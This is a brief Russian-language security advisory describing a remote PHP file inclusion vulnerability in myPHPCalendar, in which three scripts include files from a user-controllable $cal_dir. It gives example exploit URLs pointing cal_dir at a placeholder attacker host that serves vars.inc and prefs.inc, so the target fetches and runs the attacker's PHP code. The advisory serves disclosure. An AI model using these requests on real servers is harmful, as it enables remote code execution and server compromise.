Программа: myPHPCalendar 10192000 Build 1 Beta 

Уязвимость обнаружена в myPHPCalendar. Удаленный атакующий может выполнить произвольный PHP код, включая команды операционной системы, на целевой системе.
Сценарии ‘admin.php’, ‘contacts.php’, и ‘convert-date.php’ включают файлы из $cal_dir каталога. Удаленный пользователь может определить удаленное местоположение для $cal_dir каталога, чтобы включить и выполнить произвольный PHP сценарий на целевом сервере. 

Пример/Эксплоит: 

http://[target]/admin.php? cal_dir=http://[attacker]/
http://[target]/contacts.php? cal_dir=http://[attacker]/
http://[target]/convert-date.php? cal_dir=http://[attacker]/

где

http://[attacker]/vars.inc
http://[attacker]/prefs.inc



Оставить мнение